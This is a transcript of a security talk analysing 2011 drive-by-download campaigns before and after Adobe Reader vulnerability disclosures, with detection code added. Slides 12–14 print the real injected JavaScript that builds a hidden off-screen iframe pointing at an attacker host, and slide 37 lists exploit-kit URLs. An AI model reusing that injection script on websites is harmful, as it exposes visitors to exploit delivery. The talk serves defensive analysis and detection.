Transcript of "Drive by-download attack evolution zero nights v3"

1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure
   Vladimir B. Kropotov, TBINFORM (TNK-BP Group)

2. Drive-By-Download
   • Hackers distribute malware by "poisoning" legitimate websites
   • Hacker injects malicious iframes into HTML content
   • Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. used by attacker
   You just want information about insurance, nothing more, but…

3. What does it look like?
   Diagram labels: PC connected to the Internet; Known server with iframe; Intermediate server controlled by attacker; Exploit server controlled by attacker (Exploit: OS, browser plugins, etc.; INFO); Malware server controlled by attacker (Host ready; Malware)
4. How we find it?
   Date/Time           2011-08-05 10:44:53 YEKST
   Tag Name            PDF_XFA_Script
   Observance Type     Intrusion Detection
   Cleared Flag        false
   Target IP Address   10.X.X.X
   Target Object Name  9090
   Target Object Type  Target Port
   Target Service      unknown
   Source IP Address   10.X.X.Y
   Source Port Name    2359
   compressed          zlib
   server              total.logeater.org
   URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

5. DOES USER NEED IT?? How we find it?
   Date/Time           2011-08-05 10:44:53
   Tag Name            PDF_XFA_Script
   Target IP Address   10.X.X.X
   Target Object Name  9090
   Target Object Type  Target Port
   Source IP Address   10.X.X.Y
   Source Port Name    2359
   compressed          zlib
   server              total.logeater.org
   URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

6. First indicators
   Date/Time   2011-07-26 11:24:37
   Tag Name    PDF_XFA_Script
   arg         3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
   compressed  zlib
   server      mamjhvbw.dyndns.pro
   URL         /ghqlv3ym/

7. First indicators
   Date/Time   2011-08-16 13:24:44
   Tag Name    ActiveX_Warning
   clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
   server      skipetar.in
   URL         /jb/pda.js

   Date/Time   2011-08-18 19:00:13
   Tag Name    ActiveX_Warning
   clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
   server      e1in.in
   URL         /stat/574a353789f/pda.js

8. First indicators
   Date/Time   2011-08-09 10:17:14
   Tag Name    PDF_XFA_Script
   arg         host=http://inaptly.in&b=486def4
   compressed  gzip
   server      inaptly.in
   URL         /jb/lastrger.php

   Date/Time   2011-08-14 14:06:28
   Tag Name    PDF_XFA_Script
   arg         host=http://oligist.in&b=486def4
   compressed  gzip
   server      oligist.in
   URL         /jb/lastrger.php

   Date/Time   2011-08-18 19:00:13
   Tag Name    PDF_XFA_Script
   arg         host=http://e1in.in/stat&u=root
   compressed  zlib
   server      e1in.in
   URL         /stat/574a353789f/lastrger.php

9. First indicators (all six alerts together)
   2011-07-26 11:24:37  PDF_XFA_Script   arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750; compressed zlib; server mamjhvbw.dyndns.pro; URL /ghqlv3ym/
   2011-08-09 10:17:14  PDF_XFA_Script   arg host=http://inaptly.in&b=486def4; compressed gzip; server inaptly.in; URL /jb/lastrger.php
   2011-08-14 14:06:28  PDF_XFA_Script   arg host=http://oligist.in&b=486def4; compressed gzip; server oligist.in; URL /jb/lastrger.php
   2011-08-16 13:24:44  ActiveX_Warning  clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA; server skipetar.in; URL /jb/pda.js
   2011-08-18 19:00:13  ActiveX_Warning  clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA; server e1in.in; URL /stat/574a353789f/pda.js
   2011-08-18 19:00:13  PDF_XFA_Script   arg host=http://e1in.in/stat&u=root; compressed zlib; server e1in.in; URL /stat/574a353789f/lastrger.php
10. Example: o-strahovanie.ru

11. Example: o-strahovanie.ru
12. Example: o-strahovanie.ru, Sep 02
    Script injected into the page (the cookie captured next to it: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*):

    // ============ bbb ============
    document.xmlSettings.if_ik = false;
    if (window.localStorage) {
        if (window.localStorage.if_ik) {
            if (parseInt(window.localStorage.if_ik) + 2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik = true;
        } else document.xmlSettings.if_ik = true;
    } else { // 4 osel
        if (document.xmlSettings.getCookie("if_ik")) {
            if (parseInt(document.xmlSettings.getCookie("if_ik")) + 2592000 < document.xmlSettings.time())
                document.xmlSettings.if_ik = true;
        } else document.xmlSettings.if_ik = true;
    }
    if (document.xmlSettings.if_ik) {
        if (window.localStorage) window.localStorage.if_ik = document.xmlSettings.time();
        else document.xmlSettings.setCookie("if_ik", document.xmlSettings.time(), { expires: (document.xmlSettings.time() + 86400 * 365) });
        document.xmlSettings.iframe = document.createElement("iframe");
        document.xmlSettings.iframe.style.cssText = "height:1px;position:absolute;width:1px;border:none;left:-5000px;";
        document.body.appendChild(document.xmlSettings.iframe);
        document.xmlSettings.iframe.src = "htt" + "p://" + "disreg" + "arding.i" + "n/xtqd2/08.p" + "hp";
    }

13. Example: o-strahovanie.ru
    The part that matters, from the same script:

    // ============ bbb ============
    else { // 4 osel
        if (document.xmlSettings.getCookie("if_ik")) {
    ...
    document.xmlSettings.iframe = document.createElement("iframe");
    document.xmlSettings.iframe.style.cssText = "height:1px;position:absolute;width:1px;border:none;left:-5000px;";
    document.body.appendChild(document.xmlSettings.iframe);
    document.xmlSettings.iframe.src = "htt" + "p://" + "disreg" + "arding.i" + "n/xtqd2/08.p" + "hp";
    }

    Cookie: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*

14. Example: o-strahovanie.ru
    else { // 4 osel
    …
    document.body.appendChild(document.xmlSettings.iframe);
    document.xmlSettings.iframe.src = "htt" + "p://" + "disreg" + "arding.i" + "n/xtqd2/08.p" + "hp";
    }

    The concatenated string resolves to: iframe.src = http://disregarding.in/xtqd2/08.php
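As an added example (not code from the talk), the following Python check is what a site owner or SOC analyst could run over a fetched copy of a page to spot the injection pattern shown on slides 12 to 14: a script that creates an iframe, styles it 1 px and far off-screen, and assembles a third-party `src` from string fragments. It also catches statically written hidden iframes. The sample page, the helper names and the `.invalid` hosts are constructed here; `disregarding.in` and the cssText are the values from the slides.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: the <script> reproduces the injection pattern shown on the
# slides (1px off-screen iframe, src built from string fragments). The visible 300x250
# banner iframe is a control that must not be flagged; the 1x1 "tracker" iframe is a
# control that shows a hidden third-party frame is flagged even without a script.
SAMPLE_PAGE = """<html><body><p>Insurance news</p>
<script>
document.xmlSettings.iframe=document.createElement("iframe");
document.xmlSettings.iframe.style.cssText="height:1px;position:absolute;width:1px;border:none;left:-5000px;";
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src="htt"+"p://"+"disreg"+"arding.i"+"n/xtqd2/08.p"+"hp";
</script>
<iframe src="http://banner.example-partner.invalid/ad" width="300" height="250"></iframe>
<iframe src="http://tracker.example-partner.invalid/p" width="1" height="1"></iframe>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
URL_RE = re.compile(r"""["'](https?://[^"']+)["']""", re.I)
# Styling that keeps a frame out of the user's sight: 0/1 px boxes, far-negative offsets, hidden/none.
HIDDEN_CSS_RE = re.compile(
    r"(?:height|width)\s*:\s*[01]px|left\s*:\s*-\d{3,}px|visibility\s*:\s*hidden|display\s*:\s*none", re.I)
HIDDEN_ATTR_RE = re.compile(r"""(?:width|height)\s*=\s*["']?[01](?!\d)""", re.I)
CONCAT_RE = [
    re.compile(r'"([^"\n]*)"\s*\+\s*"([^"\n]*)"'),
    re.compile(r"'([^'\n]*)'\s*\+\s*'([^'\n]*)'"),
]


def deobfuscate_concat(js):
    """Fold "a"+"b" string concatenations until nothing changes, so a split URL becomes one literal."""
    prev = None
    while prev != js:
        prev = js
        for pat in CONCAT_RE:
            quote = pat.pattern[0]
            js = pat.sub(lambda m, q=quote: q + m.group(1) + m.group(2) + q, js)
    return js


def registrable(host):
    """Crude registrable-domain guess (last two labels); a real tool would use the public suffix list."""
    return ".".join(host.lower().split(".")[-2:]) if host else None


def find_injected_iframes(html, site_host):
    """Return hidden iframes pointing at third-party hosts, whether script-created or static."""
    own = registrable(site_host)
    findings = []
    for m in SCRIPT_RE.finditer(html):
        js = deobfuscate_concat(m.group(1))
        if "createElement" not in js or "iframe" not in js.lower() or not HIDDEN_CSS_RE.search(js):
            continue
        for url in URL_RE.findall(js):
            host = urlparse(url).hostname
            if host and registrable(host) != own:
                findings.append({"kind": "script-created iframe", "url": url, "host": host})
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        src = re.search(r"""src\s*=\s*["']([^"']+)""", tag, re.I)
        if not src or not (HIDDEN_CSS_RE.search(tag) or HIDDEN_ATTR_RE.search(tag)):
            continue
        host = urlparse(src.group(1)).hostname
        if host and registrable(host) != own:
            findings.append({"kind": "static hidden iframe", "url": src.group(1), "host": host})
    return findings


if __name__ == "__main__":
    for f in find_injected_iframes(SAMPLE_PAGE, "www.o-strahovanie.ru"):
        print(f"{f['kind']}: {f['url']}")
```

The 1x1 tracker frame is flagged on purpose: legitimate tracking pixels match the same shape, so the output is a triage list, and the next step is the one the talk takes, checking the target domain's age and registrant rather than trusting the match alone.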
15. Drive By Download, o-strahovanie.ru, Sep 02
    Diagram, same layout as slide 3: o-strahovanie.ru is the known server with iframe, disregarding.in the intermediate server; the exploit stage and the malware stage are both marked NO.

16. Drive By Download, o-strahovanie.ru, Sep 12
    Diagram, same layout as slide 3: intermediate server disregarding.in; exploit server and malware server chamberwoman.in, janiculum.in.
17. Example: o-strahovanie.ru
    Domain Name:         DISREGARDING.IN
    Created On:          14-Jul-2011 11:09:59 UTC
    Registrant Name:     Russell Rosario
    Registrant Street1:  136 Oakdale Avenue
    City:                Winter Haven
    Registrant Country:  US
    Email:               russellsrosario@teleworm.com
    Name Server:         NS1.PRIDES.ME
    Name Server:         NS2.PRIDES.ME

    Domain Name:         JANICULUM.IN, CHAMBERWOMAN.IN
    Created On:          12-Sep-2011 08:14 UTC
    Registrant Name:     Russell Rosario

18. Example: o-strahovanie.ru
    Domain Name:         DISREGARDING.IN
    Created On:          14-Jul-2011 11:09:59 UTC

    Domain Name:         JANICULUM.IN, CHAMBERWOMAN.IN
    Created On:          12-Sep-2011 08:14 UTC
    Registrant Name:     Russell Rosario

    No payload, because no payload requests? Are they looking for customers?

19. Example: o-strahovanie.ru
    Domain ID:           D5165642-AFIN
    Domain Name:         DISREGARDING.IN
    Created On:          14-Jul-2011 11:09:59 UTC
    Registrant Name:     Russell Rosario
    Registrant Street1:  136 Oakdale Avenue
    City:                Winter Haven
    Registrant Country:  US
    Email:               russellsrosario@teleworm.com
    Name Server:         NS1.PRIDES.ME
    Name Server:         NS2.PRIDES.ME

20. Russell Rosario
    Domain Name:               FILTRATED.IN
    Created On:                14-Jul-2011 11:09:53 UTC
    Sponsoring Registrar:      Directi Web Services Pvt. Ltd. (R118-AFIN)
    Registrant ID:             TS_16731618
    Registrant Name:           Russell Rosario
    Registrant Street1:        136 Oakdale Avenue
    Registrant City:           Winter Haven
    Registrant State/Province: Florida
    Registrant Postal Code:    33830
    Registrant Country:        US
    Registrant Phone:          +1.8635571308
    Email:                     russellsrosario@teleworm.com

    Side column: filtrated.in, raptnesses.in, tansies.in, each with a Created On timestamp within the same minute (14-Jul-2011 11:09:53 to 11:10:03 UTC).

    But Sally doesn't know…
21. Attack before public disclosure
    • Primary location for malicious sites: .IN
    • Physical servers location by IP address: Romania
    • Responsible person: Russell Rosario
    • Domains are new

22. Domain owner is the same
    Domain Name     Created On                Registrant Name
    irrefutably.in  15-Jul-2011 11:00:21 UTC  Russell Rosario
    comprador.in    25-Jul-2011 05:59:54 UTC  Russell Rosario
    hyalines.in     29-Jul-2011 09:39:33 UTC  Russell Rosario
    suffrago.in     01-Aug-2011 05:35:12 UTC  Russell Rosario
    ruritanian.in   01-Aug-2011 05:35:50 UTC  Russell Rosario

    20-Jul-2011: Acrobat vulnerability, vendor notified
23. Vulnerability reported to vendor
    VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
    X. DISCLOSURE TIMELINE
    2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
    2011-09-14 - Public disclosure

    ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
    -- Disclosure Timeline:
    2011-07-20 - Vulnerability reported to vendor
    2011-10-26 - Coordinated public release of advisory

    ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
    -- Disclosure Timeline:
    2011-07-20 - Vulnerability reported to vendor
    2011-10-27 - Coordinated public release of advisory
24. Harvesting machine started
    Domain Name       Created On                Registrant Name
    microdrili.in     05-Aug-2011 07:13:08 UTC  Russell Rosario
    oligist.in        05-Aug-2011 07:13:12 UTC  Russell Rosario
    provost.in        05-Aug-2011 07:13:18 UTC  Russell Rosario
    vaginalitis.in    05-Aug-2011 07:13:25 UTC  Russell Rosario
    kremlinology.in   05-Aug-2011 07:13:35 UTC  Russell Rosario
    invariance.in     05-Aug-2011 07:13:41 UTC  Russell Rosario
    alleghenian.in    05-Aug-2011 07:13:48 UTC  Russell Rosario
    dandifies.in      05-Aug-2011 07:14:06 UTC  Russell Rosario
    xenophoby.in      05-Aug-2011 07:14:09 UTC  Russell Rosario
    alliaria.in       05-Aug-2011 07:14:15 UTC  Russell Rosario
    skipetar.in       05-Aug-2011 07:14:21 UTC  Russell Rosario
    inaptly.in        05-Aug-2011 07:15:05 UTC  Russell Rosario
    allhallowtide.in  05-Aug-2011 07:15:20 UTC  Russell Rosario
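The two WHOIS tables (slides 22 and 24) show the signal the talk is pointing at: one registrant, thirteen domains created within about two minutes, all inside the window between vendor notification and public disclosure. The Python below is an added example, not the author's tooling, that turns those observations into two checks a threat-intel or abuse team can run over WHOIS exports: burst detection per registrant, and bucketing of registration dates against the disclosure timeline. The records are the values from slides 17, 22 and 24 (JANICULUM.IN and CHAMBERWOMAN.IN are shown without seconds, so :00 is assumed); the "Constructed Control" record and the function names are assumptions made here.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# (domain, Created On in UTC, registrant) as shown on the slides; the last record is a
# constructed control registered by someone else in the middle of the burst window.
WHOIS_RECORDS = [
    ("disregarding.in", "14-Jul-2011 11:09:59", "Russell Rosario"),
    ("irrefutably.in", "15-Jul-2011 11:00:21", "Russell Rosario"),
    ("comprador.in", "25-Jul-2011 05:59:54", "Russell Rosario"),
    ("hyalines.in", "29-Jul-2011 09:39:33", "Russell Rosario"),
    ("suffrago.in", "01-Aug-2011 05:35:12", "Russell Rosario"),
    ("ruritanian.in", "01-Aug-2011 05:35:50", "Russell Rosario"),
    ("microdrili.in", "05-Aug-2011 07:13:08", "Russell Rosario"),
    ("oligist.in", "05-Aug-2011 07:13:12", "Russell Rosario"),
    ("provost.in", "05-Aug-2011 07:13:18", "Russell Rosario"),
    ("vaginalitis.in", "05-Aug-2011 07:13:25", "Russell Rosario"),
    ("kremlinology.in", "05-Aug-2011 07:13:35", "Russell Rosario"),
    ("invariance.in", "05-Aug-2011 07:13:41", "Russell Rosario"),
    ("alleghenian.in", "05-Aug-2011 07:13:48", "Russell Rosario"),
    ("dandifies.in", "05-Aug-2011 07:14:06", "Russell Rosario"),
    ("xenophoby.in", "05-Aug-2011 07:14:09", "Russell Rosario"),
    ("alliaria.in", "05-Aug-2011 07:14:15", "Russell Rosario"),
    ("skipetar.in", "05-Aug-2011 07:14:21", "Russell Rosario"),
    ("inaptly.in", "05-Aug-2011 07:15:05", "Russell Rosario"),
    ("allhallowtide.in", "05-Aug-2011 07:15:20", "Russell Rosario"),
    ("janiculum.in", "12-Sep-2011 08:14:00", "Russell Rosario"),     # seconds assumed
    ("chamberwoman.in", "12-Sep-2011 08:14:00", "Russell Rosario"),  # seconds assumed
    ("control-example.in", "05-Aug-2011 07:13:30", "Constructed Control"),
]

VENDOR_NOTIFIED = datetime(2011, 7, 20)    # slides 22 and 23
PUBLIC_DISCLOSURE = datetime(2011, 9, 14)  # slides 23 and 30


def parse_created(s):
    return datetime.strptime(s, "%d-%b-%Y %H:%M:%S")


def registration_bursts(records, max_gap=timedelta(seconds=60), min_size=3):
    """Group each registrant's domains into chains whose consecutive registrations are at
    most max_gap apart. A chain of min_size or more is the fingerprint of scripted bulk
    registration rather than a person filling in forms; the registrant key is what ties
    the chain together, so the control record is not absorbed into the burst."""
    by_registrant = defaultdict(list)
    for domain, created, registrant in records:
        by_registrant[registrant].append((parse_created(created), domain))
    bursts = []
    for registrant, items in by_registrant.items():
        items.sort()
        i = 0
        while i < len(items):
            j = i
            while j + 1 < len(items) and items[j + 1][0] - items[j][0] <= max_gap:
                j += 1
            if j - i + 1 >= min_size:
                bursts.append({
                    "registrant": registrant,
                    "start": items[i][0],
                    "end": items[j][0],
                    "domains": [d for _, d in items[i:j + 1]],
                })
            i = j + 1
    return bursts


def phase_counts(records, vendor_notified=VENDOR_NOTIFIED, public_disclosure=PUBLIC_DISCLOSURE):
    """Count registrations before the vendor was notified, during the embargo, and after disclosure."""
    counts = {"before_notification": 0, "during_embargo": 0, "after_disclosure": 0}
    for _, created, _ in records:
        t = parse_created(created)
        if t < vendor_notified:
            counts["before_notification"] += 1
        elif t < public_disclosure:
            counts["during_embargo"] += 1
        else:
            counts["after_disclosure"] += 1
    return counts


if __name__ == "__main__":
    for b in registration_bursts(WHOIS_RECORDS):
        print(f"{b['registrant']}: {len(b['domains'])} domains, {b['start']} to {b['end']}")
    print(phase_counts(WHOIS_RECORDS))
```

With a 60 s gap and a minimum chain of three, only the 5 August run is reported (13 domains in 132 s); the two-domain pairs on 1 August and 12 September fall below the threshold, which is the right default, since pairs happen to legitimate registrants too.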
25. But maybe someone knows?
    • Spamlists
    • AV vendors
    • Safebrowsing
    • Securityfocus

26. Spamlists, Aug 19

27. AV vendors, Aug 18

28. Safebrowsing, Aug 20
29. Securityfocus, Sep 07
    Sent: Wednesday, September 07, 2011 11:31 PM
    Subject: There is a strange GET request header in all webpages of my site? I'm worried about a Trojan attack!
    Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL:
    "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
30. PDF vulnerabilities public disclosure, Sep 14. What to expect?

31. PDF vulnerabilities public disclosure, Sep 14. What to expect?
    NO GOOD NEWS, JUST EPIC FAIL for site administrators

32. No good news. Hundreds of domains were registered
    ITALIA-NEW.IN        KLERK-EVEN.RU
    BANER-KLERK.RU       KLERK-EVENTS.RU
    BANK-KLERK.RU        KLERK-LAW.RU
    BANNER-KLERK.RU      KLERK-NEW.RU
    BLOGS-KLERK.RU       KLERK-NEWS.RU
    BUH-KLERK.RU         KLERK-REKLAMA.RU
    DAILY-KP.RU          KLERK-RU.RU
    FORUM-KLERK.RU       KLERK-WORK.RU
    I-OBOZREVATEL.RU     KLERK2.RU
    INTERFAX-REGION.RU   OBOZREVATEL-RU.RU
    JOB-KLERK.RU         OBOZREVATELRU.RU
    KLERK-BANK.RU        WIKI-KLERK.RU
    KLERK-BANKIR.RU      PRESS-RZD.RU
    KLERK-BIZ.RU         RZD-RZD.RU
    KLERK-BOSS.RU        IPGEOBASE.IN
    KLERK-BUH.RU         ***

33. "New generation"
    Diagram, same layout as slide 3 (PC connected to the Internet; Known server with iframe; Intermediate server controlled by attacker; Exploit server controlled by attacker; Malware server controlled by attacker), with an additional node: Other known server NOT controlled by attacker.

34. Attack after public disclosure
    • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
    • Physical servers location by IP address: international
    • Domains registered to different spurious persons
    • Domain lifetime ~ time to blacklist appearance
    • Attack refers to the malicious server for a short period of time, and to a well-known one almost all day long (blacklist evasion technique)
    • If you don't know the exact malware URL, the site redirects to a well-known server
    • Different types of payload used: password stealers, win lockers, and even "normal" (or another ZD) files installed
35. Known sites examples: RZD.RU (Russian railroads)

36. Known sites examples: RZD.RU

37. Just TWO domains, SURE?
    Domain                  URL
    interfax-rzd.in         http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
    rzd-interfax-online.in  http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
    news-rzdstyle.in        http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
    rzd-rzd.in              http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
    therzd-rzd.in           http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
    rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
    rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
    rzd-rzdcomp.in          http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
    press-rzd.in            http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
    rzd-press.in            http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
    rzd-banner.in           http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
    pass-rzd.in             http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
    rzd-ticket.in           http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
38. Known sites examples: RZD.RU (Russian railroads)

39. Known sites examples: RZD.RU

40. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)

41. Known sites examples: KP.RU

42. Other examples: EG.RU (newspaper, 263 685 visits per day)

43. Other examples: svpressa.ru (newspaper, 276 720 visits per day)

44. URA.RU (news, 22 486 visits per day)

45. URA.RU (news, 22 486 visits per day)

46. URA.RU (news, 22 486 visits per day)
47. Other examples: ria.ru (news, 667 222 visits per day)
    Datetime  [09/Nov/2011:12:26:45 +0300]
    Url       GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
    IP        176.9.50.178
    Site      jya56yhsvcsss.com
    Referrer  http://ria.ru/

48. Other examples: inosmi.ru (news, 175 361 visits per day)
    Datetime  [09/Nov/2011:12:28:10 +0300]
    Url       GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1
    IP        176.9.50.178
    Site      jya56yhsvcsss.com
    Referrer  http://inosmi.ru/

49. Other examples: glavbukh.ru (15 200 visits per day)
    Datetime  [09/Nov/2011:12:14:46 +0300]
    Url       GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
    IP        176.9.50.178
    Site      jya56yhsvcsss.com
    Referrer  http://www.glavbukh.ru/
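Slides 47 to 49 show the same unknown host and path being fetched, within a quarter of an hour, with three unrelated high-traffic news sites as referrers, and slide 34 explains why that is the tell: the malicious host is referenced only briefly, so it has not reached a blacklist yet, while the rest of the day the iframe points at something well known. The Python below is an added example (not the author's tooling) of the corresponding proxy-log check: parse records in the field layout the slides use, then flag destinations that are new to the proxy and receive the same path from several distinct referrer sites inside a short window. The three `jya56yhsvcsss.com` records copy the slide values; the `static.example-cdn.invalid` records, the baseline set and the function names are constructed here.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed proxy log in the five-field layout shown on the slides. The three
# jya56yhsvcsss.com records are the slide values; the CDN records are a constructed control
# with the same fan-in shape but a host the proxy has seen before.
PROXY_LOG = """\
Datetime [09/Nov/2011:12:14:46 +0300]
Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP 176.9.50.178
Site jya56yhsvcsss.com
Referrer http://www.glavbukh.ru/

Datetime [09/Nov/2011:12:26:45 +0300]
Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP 176.9.50.178
Site jya56yhsvcsss.com
Referrer http://ria.ru/

Datetime [09/Nov/2011:12:28:10 +0300]
Url GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1
IP 176.9.50.178
Site jya56yhsvcsss.com
Referrer http://inosmi.ru/

Datetime [09/Nov/2011:12:26:50 +0300]
Url GET http://static.example-cdn.invalid/jquery.js HTTP/1.1
IP 192.0.2.10
Site static.example-cdn.invalid
Referrer http://ria.ru/

Datetime [09/Nov/2011:12:28:12 +0300]
Url GET http://static.example-cdn.invalid/jquery.js HTTP/1.1
IP 192.0.2.10
Site static.example-cdn.invalid
Referrer http://inosmi.ru/

Datetime [09/Nov/2011:12:30:00 +0300]
Url GET http://static.example-cdn.invalid/jquery.js HTTP/1.1
IP 192.0.2.10
Site static.example-cdn.invalid
Referrer http://www.glavbukh.ru/
"""

# Constructed: destination hosts already present in earlier days' logs.
BASELINE_SITES = {"static.example-cdn.invalid"}


def registrable(host):
    """Crude registrable-domain guess (last two labels) so www.glavbukh.ru and glavbukh.ru match."""
    return ".".join(host.lower().split(".")[-2:]) if host else None


def parse_proxy_log(text):
    """Split the log into blank-line-separated records and parse time, path and referrer host."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, _, value = line.partition(" ")
            rec[key] = value.strip()
        stamp = re.match(r"\[(.+?)\]", rec["Datetime"]).group(1)
        rec["time"] = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        rec["method"], url, _ = rec["Url"].split(" ", 2)
        rec["path"] = urlparse(url).path
        rec["referrer_host"] = urlparse(rec["Referrer"]).hostname
        records.append(rec)
    return records


def suspicious_fan_in(records, baseline, min_referrers=3, window_minutes=30):
    """Flag destinations not in the baseline that several unrelated referrer sites hit
    within window_minutes: the short-lived hop the slides describe looks exactly like this."""
    by_site = defaultdict(list)
    for r in records:
        by_site[r["Site"]].append(r)
    flagged = []
    for site, recs in by_site.items():
        if site in baseline:
            continue  # a long-known destination is not the short-lived hop we are after
        referrers = {registrable(r["referrer_host"]) for r in recs if r["referrer_host"]}
        referrers.discard(registrable(site))  # same-site navigation is normal
        times = sorted(r["time"] for r in recs)
        span_min = (times[-1] - times[0]).total_seconds() / 60
        if len(referrers) >= min_referrers and span_min <= window_minutes:
            flagged.append({
                "site": site,
                "referrers": sorted(referrers),
                "paths": sorted({r["path"] for r in recs}),
                "span_minutes": round(span_min, 1),
                "ips": sorted({r["IP"] for r in recs}),
            })
    return flagged


if __name__ == "__main__":
    for f in suspicious_fan_in(parse_proxy_log(PROXY_LOG), BASELINE_SITES):
        print(f"{f['site']} {f['ips']} {f['paths']} from {f['referrers']} in {f['span_minutes']} min")
```

Run with an empty baseline, the CDN control is flagged as well, which is the caveat to keep in mind: fan-in from many referrers is also what every CDN and ad network looks like, so the first-seen check (or a domain-age lookup, as on the WHOIS slides) is what separates the two.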
50. Malware examples: banks targeted attack

51. Malware examples: banks targeted attack

52. Another news, another phone…
    • Legal
    • Faked

53. Malware examples: banks targeted attack

54. Malware examples: banks targeted attack

55. Malware examples: 01ie.ru, 02ie.ru, 03ie.ru (registered by reg.ru)

56. Malware examples: 01ie.ru, 02ie.ru, 03ie.ru (registered by reg.ru)

57. Malware examples

58. Script examples

59. Sample analysis (VirusTotal)

60. Sample analysis (VirusTotal)

61. Sample analysis (VirusTotal)

62. Sample analysis (VirusTotal)

63. Sample analysis (VirusTotal)

64. Sample analysis (VirusTotal)
65. What can we do?
    • Patch endpoints
    • Tighten the Internet filtering (default deny if possible)
    • No Internet surfing with admin rights
    • See what's happening (continuous monitoring)
    • Check if you're well (regular technical audits)
    • Educate people

66. Credits
    • Sergey V. Soldatov, TBINFORM (TNK-BP Group)
    • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group)
    • Wayne Huang, ARMORIZE

67. THE END
    Vladimir B. Kropotov, information security analyst, TBINFORM (TNK-BP Group)
    vbkropotov@tnk-bp.com
    kropotov@ieee.org
